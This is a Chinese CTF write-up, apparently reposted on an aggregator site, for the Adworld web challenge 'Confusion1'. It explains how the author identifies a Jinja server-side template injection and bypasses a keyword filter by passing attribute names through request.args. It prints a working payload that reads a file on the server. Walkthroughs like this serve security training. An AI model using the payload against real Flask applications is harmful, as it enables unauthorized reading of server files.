栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

攻防世界Web:Confusion1

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

攻防世界Web:Confusion1

打开页面,看见一张图片,点击Home、Login、Register都没用:

看看源代码,在Register.php中发现一点提示:
但没什么思路,去网上看了看WP,觉得这道题的提示就很扯,那张图片提示了是SSTI?!就因为图片是蛇吞象意味着python干掉php?!想了想,是我还不够头脑风暴,那就按着这个思路往下做吧,简单测试一下:

payload:{{''.__class__.__mro__[2].__subclasses__()}},发现不行,也许是过滤了某些字符吧:
但没有过滤request,request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) " 。所以可以利用request.args绕过输入黑名单,进行沙箱逃逸,payload:

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

拿到flag:

总结:
SSTI
request.args绕过

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/329335.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号